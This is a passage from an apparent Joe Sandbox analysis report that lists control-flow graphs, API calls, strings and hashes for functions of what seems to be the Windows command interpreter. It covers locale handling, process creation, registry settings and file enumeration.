7ff6eb18f170-7ff6eb18f17b 455->462 463 7ff6eb18f15a-7ff6eb18f161 455->463 456->445 456->451 464 7ff6eb18f18e-7ff6eb18f198 457->464 465 7ff6eb18548c-7ff6eb1854ae GetLocaleInfoW 458->465 466 7ff6eb18f1c4-7ff6eb18f1ce 458->466 459->460 461 7ff6eb18f120-7ff6eb18f12b 459->461 460->453 461->454 461->460 462->457 463->462 468 7ff6eb18f163-7ff6eb18f16e 463->468 469 7ff6eb18f1b0-7ff6eb18f1bb 464->469 470 7ff6eb18f19a-7ff6eb18f1a1 464->470 471 7ff6eb18f207-7ff6eb18f20e 465->471 472 7ff6eb1854b4-7ff6eb1854f5 setlocale call 7ff6eb188f80 465->472 467 7ff6eb18f1d1-7ff6eb18f1db 466->467 473 7ff6eb18f1f3-7ff6eb18f1fe 467->473 474 7ff6eb18f1dd-7ff6eb18f1e4 467->474 468->455 468->462 469->466 470->469 476 7ff6eb18f1a3-7ff6eb18f1ae 470->476 475 7ff6eb18f211-7ff6eb18f21b 471->475 473->471 474->473 479 7ff6eb18f1e6-7ff6eb18f1f1 474->479 480 7ff6eb18f233-7ff6eb18f23e 475->480 481 7ff6eb18f21d-7ff6eb18f224 475->481 476->464 476->469 479->467 479->473 481->480 482 7ff6eb18f226-7ff6eb18f231 481->482 482->475 482->480
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                              • API String ID: 2492766124-2236139042
                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction ID: 9f93d3cdaa0d04ac4e673c104713fbf802711c6e3949f2bbf838eeefe345b540
                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction Fuzzy Hash: 6DF14926B0868285EB118F11E5503F967A5FF0CBA8F944135CA4D977B4EF3EE909C70A
                                              Function 00007FF6EB184224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 483 7ff6eb184224-7ff6eb1842a5 InitializeProcThreadAttributeList 484 7ff6eb1842ab-7ff6eb1842e5 UpdateProcThreadAttribute 483->484 485 7ff6eb18ecd4-7ff6eb18ecee GetLastError call 7ff6eb199eec 483->485 486 7ff6eb18ecf0-7ff6eb18ed19 GetLastError call 7ff6eb199eec DeleteProcThreadAttributeList 484->486 487 7ff6eb1842eb-7ff6eb1843c6 memset * 2 GetStartupInfoW call 7ff6eb183a90 call 7ff6eb17b900 484->487 494 7ff6eb18ed1e 485->494 486->494 497 7ff6eb1843cc-7ff6eb1843d3 487->497 498 7ff6eb184638-7ff6eb184644 _local_unwind 487->498 499 7ff6eb184649-7ff6eb184650 497->499 500 7ff6eb1843d9-7ff6eb1843dc 497->500 498->499 499->500 503 7ff6eb184656-7ff6eb18465d 499->503 501 7ff6eb184415-7ff6eb184424 call 7ff6eb185a68 500->501 502 7ff6eb1843de-7ff6eb1843f5 wcsrchr 500->502 510 7ff6eb18442a-7ff6eb184486 CreateProcessW 501->510 511 7ff6eb184589-7ff6eb184590 501->511 502->501 504 7ff6eb1843f7-7ff6eb18440f lstrcmpW 502->504 503->501 506 7ff6eb184663 503->506 504->501 507 7ff6eb184668-7ff6eb18466d call 7ff6eb199044 504->507 506->500 507->501 513 7ff6eb18448b-7ff6eb18448f 510->513 511->510 514 7ff6eb184596-7ff6eb1845fa CreateProcessAsUserW 511->514 515 7ff6eb184495-7ff6eb1844c7 CloseHandle call 7ff6eb18498c 513->515 516 7ff6eb184672-7ff6eb184682 GetLastError 513->516 514->513 519 7ff6eb18468d-7ff6eb184694 515->519 520 7ff6eb1844cd-7ff6eb1844e5 515->520 516->519 521 7ff6eb184696-7ff6eb1846a0 519->521 522 7ff6eb1846a2-7ff6eb1846ac 519->522 523 7ff6eb1844eb-7ff6eb1844f2 520->523 524 7ff6eb1847a3-7ff6eb1847a9 520->524 521->522 525 7ff6eb1846ae-7ff6eb1846b5 call 7ff6eb1897bc 521->525 522->525 526 7ff6eb184705-7ff6eb184707 522->526 527 7ff6eb1844f8-7ff6eb184507 523->527 528 7ff6eb1845ff-7ff6eb184607 523->528 541 7ff6eb1846b7-7ff6eb184701 call 7ff6eb1cc038 525->541 542 7ff6eb184703 525->542 526->520 530 7ff6eb18470d-7ff6eb18472a call 7ff6eb17cd90 526->530 531 7ff6eb18450d-7ff6eb184512 call 7ff6eb185cb4 527->531 532 7ff6eb184612-7ff6eb184616 527->532 528->527 533 7ff6eb18460d 528->533 543 7ff6eb18473d-7ff6eb184767 call 7ff6eb1813e0 call 7ff6eb199eec call 7ff6eb17ff70 _local_unwind 530->543 544 7ff6eb18472c-7ff6eb184738 _local_unwind 530->544 547 7ff6eb184517-7ff6eb18455e call 7ff6eb1833f0 call 7ff6eb18498c 531->547 539 7ff6eb18461c-7ff6eb184633 532->539 540 7ff6eb1847d7-7ff6eb1847df 532->540 538 7ff6eb18476c-7ff6eb184773 533->538 538->527 548 7ff6eb184779-7ff6eb184780 538->548 545 7ff6eb1847f2-7ff6eb18483c call 7ff6eb17ff70 DeleteProcThreadAttributeList call 7ff6eb188f80 539->545 540->545 546 7ff6eb1847e1-7ff6eb1847ed CloseHandle 540->546 541->526 542->526 543->538 544->543 546->545 568 7ff6eb184564-7ff6eb184579 call 7ff6eb18498c 547->568 569 7ff6eb1847ae-7ff6eb1847ca call 7ff6eb1833f0 547->569 548->527 553 7ff6eb184786-7ff6eb184789 548->553 553->527 558 7ff6eb18478f-7ff6eb184792 553->558 558->524 562 7ff6eb184794-7ff6eb18479d call 7ff6eb19a250 558->562 562->524 562->527 568->545 576 7ff6eb18457f-7ff6eb184584 call 7ff6eb19a920 568->576 569->540 576->545
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                              • API String ID: 388421343-2905461000
                                              • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction ID: 4ad3f9c0ac13b110fd7e09abc6a3adad261ad1423e8593938282a54c16109952
                                              • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction Fuzzy Hash: 2CF13B33A18B8286EA608B11E4547FAB7A5FB8D7A8F504135D94D83774DF3EE444CB0A
                                              Function 00007FF6EB185554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 579 7ff6eb185554-7ff6eb1855b9 call 7ff6eb18a640 582 7ff6eb1855bc-7ff6eb1855e8 RegOpenKeyExW 579->582 583 7ff6eb185887-7ff6eb18588e 582->583 584 7ff6eb1855ee-7ff6eb185631 RegQueryValueExW 582->584 583->582 587 7ff6eb185894-7ff6eb1858db time srand call 7ff6eb188f80 583->587 585 7ff6eb185637-7ff6eb185675 RegQueryValueExW 584->585 586 7ff6eb18f248-7ff6eb18f24d 584->586 588 7ff6eb185677-7ff6eb18567c 585->588 589 7ff6eb18568e-7ff6eb1856cc RegQueryValueExW 585->589 591 7ff6eb18f24f-7ff6eb18f25b 586->591 592 7ff6eb18f260-7ff6eb18f265 586->592 593 7ff6eb185682-7ff6eb185687 588->593 594 7ff6eb18f28b-7ff6eb18f290 588->594 595 7ff6eb18f2b6-7ff6eb18f2bb 589->595 596 7ff6eb1856d2-7ff6eb185710 RegQueryValueExW 589->596 591->585 592->585 598 7ff6eb18f26b-7ff6eb18f286 _wtol 592->598 593->589 594->589 603 7ff6eb18f296-7ff6eb18f2b1 _wtol 594->603 599 7ff6eb18f2ce-7ff6eb18f2d3 595->599 600 7ff6eb18f2bd-7ff6eb18f2c9 595->600 601 7ff6eb185729-7ff6eb185767 RegQueryValueExW 596->601 602 7ff6eb185712-7ff6eb185717 596->602 598->585 599->596 604 7ff6eb18f2d9-7ff6eb18f2f4 _wtol 599->604 600->596 607 7ff6eb185769-7ff6eb18576e 601->607 608 7ff6eb18579f-7ff6eb1857dd RegQueryValueExW 601->608 605 7ff6eb18571d-7ff6eb185722 602->605 606 7ff6eb18f2f9-7ff6eb18f2fe 602->606 603->589 604->596 605->601 606->601 609 7ff6eb18f304-7ff6eb18f31a wcstol 606->609 610 7ff6eb18f320-7ff6eb18f325 607->610 611 7ff6eb185774-7ff6eb18578f 607->611 612 7ff6eb1857e3-7ff6eb1857e8 608->612 613 7ff6eb18f3a9 608->613 609->610 614 7ff6eb18f327-7ff6eb18f33f wcstol 610->614 615 7ff6eb18f34b 610->615 616 7ff6eb185795-7ff6eb185799 611->616 617 7ff6eb18f357-7ff6eb18f35e 611->617 618 7ff6eb18f363-7ff6eb18f368 612->618 619 7ff6eb1857ee-7ff6eb185809 612->619 620 7ff6eb18f3b5-7ff6eb18f3b8 613->620 614->615 615->617 616->608 616->617 617->608 621 7ff6eb18f38e 618->621 622 7ff6eb18f36a-7ff6eb18f382 wcstol 618->622 623 7ff6eb18f39a-7ff6eb18f39d 619->623 624 7ff6eb18580f-7ff6eb185813 619->624 626 7ff6eb18f3be-7ff6eb18f3c5 620->626 627 7ff6eb18582c 620->627 621->623 622->621 623->613 624->623 625 7ff6eb185819-7ff6eb185823 624->625 625->620 628 7ff6eb185829 625->628 629 7ff6eb185832-7ff6eb185870 RegQueryValueExW 626->629 627->629 630 7ff6eb18f3ca-7ff6eb18f3d1 627->630 628->627 631 7ff6eb185876-7ff6eb185882 RegCloseKey 629->631 632 7ff6eb18f3dd-7ff6eb18f3e2 629->632 630->632 631->583 633 7ff6eb18f433-7ff6eb18f439 632->633 634 7ff6eb18f3e4-7ff6eb18f412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff6eb18f43f-7ff6eb18f44c call 7ff6eb17b900 633->635 636 7ff6eb18f414-7ff6eb18f426 call 7ff6eb1813e0 634->636 637 7ff6eb18f428 634->637 635->631 640 7ff6eb18f42e 636->640 637->640 640->633
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseOpensrandtime
                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                              • API String ID: 145004033-3846321370
                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction ID: 804a82e11a3a57b63e2b8e46cdfa143d765c95b8275fbbdf4a37b91cc345e655
                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction Fuzzy Hash: F1E1533351DA82C6E7508B10E4507FAB7A0FB8D768F405535E98E82A78DF7EE548CB06
                                              Function 00007FF6EB1837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 821 7ff6eb1837d8-7ff6eb183887 GetCurrentThreadId OpenThread call 7ff6eb1804f4 HeapSetInformation RegOpenKeyExW 824 7ff6eb18388d-7ff6eb1838eb call 7ff6eb185920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff6eb18e9f8-7ff6eb18ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff6eb18ea41-7ff6eb18ea59 GetThreadLocale 824->828 829 7ff6eb1838f1-7ff6eb183913 memset 824->829 825->828 830 7ff6eb18ea74-7ff6eb18ea77 828->830 831 7ff6eb18ea5b-7ff6eb18ea67 828->831 832 7ff6eb183919-7ff6eb183935 call 7ff6eb184d5c 829->832 833 7ff6eb18eaa5 829->833 834 7ff6eb18ea94-7ff6eb18ea96 830->834 835 7ff6eb18ea79-7ff6eb18ea7d 830->835 831->830 842 7ff6eb18393b-7ff6eb183942 832->842 843 7ff6eb18eae2-7ff6eb18eaff call 7ff6eb173240 call 7ff6eb198530 call 7ff6eb184c1c 832->843 836 7ff6eb18eaa8-7ff6eb18eab4 833->836 834->833 835->834 838 7ff6eb18ea7f-7ff6eb18ea89 835->838 836->832 839 7ff6eb18eaba-7ff6eb18eac3 836->839 838->834 841 7ff6eb18eacb-7ff6eb18eace 839->841 846 7ff6eb18ead0-7ff6eb18eadb 841->846 847 7ff6eb18eac5-7ff6eb18eac9 841->847 844 7ff6eb183948-7ff6eb183962 _setjmp 842->844 845 7ff6eb18eb27-7ff6eb18eb40 _setjmp 842->845 849 7ff6eb18eb00-7ff6eb18eb0d 843->849 844->849 850 7ff6eb183968-7ff6eb18396d 844->850 851 7ff6eb18eb46-7ff6eb18eb49 845->851 852 7ff6eb1839fe-7ff6eb183a05 call 7ff6eb184c1c 845->852 846->836 853 7ff6eb18eadd 846->853 847->841 862 7ff6eb18eb15-7ff6eb18eb1f call 7ff6eb184c1c 849->862 855 7ff6eb1839b9-7ff6eb1839bb 850->855 856 7ff6eb18396f 850->856 858 7ff6eb18eb66-7ff6eb18eb6f call 7ff6eb1801b8 851->858 859 7ff6eb18eb4b-7ff6eb18eb65 call 7ff6eb173240 call 7ff6eb198530 call 7ff6eb184c1c 851->859 852->825 853->832 866 7ff6eb18eb20 855->866 867 7ff6eb1839c1-7ff6eb1839c3 call 7ff6eb184c1c 855->867 863 7ff6eb183972-7ff6eb18397d 856->863 877 7ff6eb18eb71-7ff6eb18eb82 _setmode 858->877 878 7ff6eb18eb87-7ff6eb18eb89 call 7ff6eb1886f0 858->878 859->858 862->866 871 7ff6eb1839c9-7ff6eb1839de call 7ff6eb17df60 863->871 872 7ff6eb18397f-7ff6eb183984 863->872 866->845 882 7ff6eb1839c8 867->882 871->862 888 7ff6eb1839e4-7ff6eb1839e8 871->888 872->863 880 7ff6eb183986-7ff6eb1839ae call 7ff6eb180580 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 872->880 877->878 889 7ff6eb18eb8e-7ff6eb18ebad call 7ff6eb1858e4 call 7ff6eb17df60 878->889 898 7ff6eb1839b3 880->898 882->871 888->852 892 7ff6eb1839ea-7ff6eb1839ef call 7ff6eb17be00 888->892 902 7ff6eb18ebaf-7ff6eb18ebb3 889->902 899 7ff6eb1839f4-7ff6eb1839fc 892->899 898->855 899->872 902->852 903 7ff6eb18ebb9-7ff6eb18ec24 call 7ff6eb1858e4 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 call 7ff6eb17be00 call 7ff6eb180580 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 902->903 903->889
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                              • API String ID: 2624720099-1920437939
                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction ID: 5c9f5a0bed28deaf2e3436219264cc06f65e2a9f46ce897129fd31c0024e6186
                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction Fuzzy Hash: DBC1CE33E086428AF7149B64A4403F9AAA0FF4E77CF544138DA0ED67B5DF3EA045870A
                                              Function 00007FF6EB18823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1118 7ff6eb18823c-7ff6eb18829b FindFirstFileExW 1119 7ff6eb1882cd-7ff6eb1882df 1118->1119 1120 7ff6eb18829d-7ff6eb1882a9 GetLastError 1118->1120 1124 7ff6eb188365-7ff6eb18837b FindNextFileW 1119->1124 1125 7ff6eb1882e5-7ff6eb1882ee 1119->1125 1121 7ff6eb1882af 1120->1121 1122 7ff6eb1882b1-7ff6eb1882cb 1121->1122 1126 7ff6eb1883d0-7ff6eb1883e5 FindClose 1124->1126 1127 7ff6eb18837d-7ff6eb188380 1124->1127 1128 7ff6eb1882f1-7ff6eb1882f4 1125->1128 1126->1128 1127->1119 1129 7ff6eb188386 1127->1129 1130 7ff6eb1882f6-7ff6eb188300 1128->1130 1131 7ff6eb188329-7ff6eb18832b 1128->1131 1129->1120 1132 7ff6eb188332-7ff6eb188353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff6eb188302-7ff6eb18830e 1130->1133 1131->1121 1134 7ff6eb18832d 1131->1134 1135 7ff6eb188356-7ff6eb188363 1132->1135 1136 7ff6eb188310-7ff6eb188313 1133->1136 1137 7ff6eb18838b-7ff6eb1883c2 GetProcessHeap HeapReAlloc 1133->1137 1134->1120 1135->1136 1140 7ff6eb188315-7ff6eb188323 1136->1140 1141 7ff6eb188327 1136->1141 1138 7ff6eb1950f8-7ff6eb19511e GetLastError FindClose 1137->1138 1139 7ff6eb1883c8-7ff6eb1883ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileFindFirstLast
                                              • String ID:
                                              • API String ID: 873889042-0
                                              • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction ID: f2e18aa780218ef2bef07233d1816177fa75ab7f6153ea080f5e5b057b46c579
                                              • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction Fuzzy Hash: 10511B37A09B42C6E7118B11E5543B9BBA1FB4DBA9F448131CA1D83364DF3EE5548B09
                                              Function 00007FF6EB182978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1142 7ff6eb182978-7ff6eb1829b6 1143 7ff6eb1829b9-7ff6eb1829c1 1142->1143 1143->1143 1144 7ff6eb1829c3-7ff6eb1829c5 1143->1144 1145 7ff6eb1829cb-7ff6eb1829cf 1144->1145 1146 7ff6eb18e441 1144->1146 1147 7ff6eb1829d2-7ff6eb1829da 1145->1147 1148 7ff6eb1829dc-7ff6eb1829e1 1147->1148 1149 7ff6eb182a1e-7ff6eb182a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff6eb1829e3-7ff6eb1829eb 1148->1150 1151 7ff6eb18e435-7ff6eb18e439 1149->1151 1152 7ff6eb182a44-7ff6eb182a5c FindClose 1149->1152 1150->1147 1153 7ff6eb1829ed-7ff6eb182a1c call 7ff6eb188f80 1150->1153 1151->1146 1154 7ff6eb182ae3-7ff6eb182ae5 1152->1154 1155 7ff6eb182a62-7ff6eb182a6e 1152->1155 1156 7ff6eb182aeb-7ff6eb182b10 _wcsnicmp 1154->1156 1157 7ff6eb18e3f7-7ff6eb18e3ff 1154->1157 1159 7ff6eb182a70-7ff6eb182a78 1155->1159 1156->1155 1160 7ff6eb182b16-7ff6eb18e3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff6eb182a7a-7ff6eb182a8d 1159->1162 1160->1155 1160->1157 1162->1146 1164 7ff6eb182a93-7ff6eb182a97 1162->1164 1165 7ff6eb182a9d-7ff6eb182ade memmove call 7ff6eb1813e0 1164->1165 1166 7ff6eb18e404-7ff6eb18e407 1164->1166 1165->1150 1167 7ff6eb18e40b-7ff6eb18e413 1166->1167 1167->1167 1170 7ff6eb18e415-7ff6eb18e42b memmove 1167->1170 1170->1151
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction ID: 43d2ec2131d2609cb4a9e66e2dae60f1f3be5f04f302d49f8b5fba9d193fb70c
                                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction Fuzzy Hash: BE51F863F0868285EA308F15A5443FAA690FB58BB8F484231DE6E876F4DF3DE4458646
                                              Function 00007FF6EB184D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 643 7ff6eb184d5c-7ff6eb184e4b InitializeCriticalSection call 7ff6eb1858e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6eb180580 call 7ff6eb184a14 call 7ff6eb184ad0 call 7ff6eb185554 GetCommandLineW 654 7ff6eb184e4d-7ff6eb184e54 643->654 654->654 655 7ff6eb184e56-7ff6eb184e61 654->655 656 7ff6eb184e67-7ff6eb184e7b call 7ff6eb182e44 655->656 657 7ff6eb1851cf-7ff6eb1851e3 call 7ff6eb173278 call 7ff6eb184c1c 655->657 662 7ff6eb1851ba-7ff6eb1851ce call 7ff6eb173278 call 7ff6eb184c1c 656->662 663 7ff6eb184e81-7ff6eb184ec3 GetCommandLineW call 7ff6eb1813e0 call 7ff6eb17ca40 656->663 662->657 663->662 674 7ff6eb184ec9-7ff6eb184ee8 call 7ff6eb18417c call 7ff6eb182394 663->674 678 7ff6eb184eed-7ff6eb184ef5 674->678 678->678 679 7ff6eb184ef7-7ff6eb184f1f call 7ff6eb17aa54 678->679 682 7ff6eb184f95-7ff6eb184fee GetConsoleOutputCP GetCPInfo call 7ff6eb1851ec GetProcessHeap HeapAlloc 679->682 683 7ff6eb184f21-7ff6eb184f30 679->683 689 7ff6eb185012-7ff6eb185018 682->689 690 7ff6eb184ff0-7ff6eb185006 GetConsoleTitleW 682->690 683->682 684 7ff6eb184f32-7ff6eb184f39 683->684 684->682 686 7ff6eb184f3b-7ff6eb184f77 call 7ff6eb173278 GetWindowsDirectoryW 684->686 695 7ff6eb184f7d-7ff6eb184f90 call 7ff6eb183c24 686->695 696 7ff6eb1851b1-7ff6eb1851b9 call 7ff6eb184c1c 686->696 693 7ff6eb18507a-7ff6eb18507e 689->693 694 7ff6eb18501a-7ff6eb185024 call 7ff6eb183578 689->694 690->689 692 7ff6eb185008-7ff6eb18500f 690->692 692->689 697 7ff6eb1850eb-7ff6eb185161 GetModuleHandleW GetProcAddress * 3 693->697 698 7ff6eb185080-7ff6eb1850b3 call 7ff6eb19b89c call 7ff6eb17586c call 7ff6eb173240 call 7ff6eb183448 693->698 694->693 706 7ff6eb185026-7ff6eb185030 694->706 695->682 696->662 704 7ff6eb185163-7ff6eb185167 697->704 705 7ff6eb18516f 697->705 724 7ff6eb1850b5-7ff6eb1850d0 call 7ff6eb183448 * 2 698->724 725 7ff6eb1850d2-7ff6eb1850d7 call 7ff6eb173278 698->725 704->705 709 7ff6eb185169-7ff6eb18516d 704->709 710 7ff6eb185172-7ff6eb1851af free call 7ff6eb188f80 705->710 711 7ff6eb185075 call 7ff6eb19cff0 706->711 712 7ff6eb185032-7ff6eb185059 GetStdHandle GetConsoleScreenBufferInfo 706->712 709->705 709->710 711->693 715 7ff6eb18505b-7ff6eb185067 712->715 716 7ff6eb185069-7ff6eb185073 712->716 715->693 716->693 716->711 729 7ff6eb1850dc-7ff6eb1850e6 GlobalFree 724->729 725->729 729->697
                                              APIs
                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184D9A
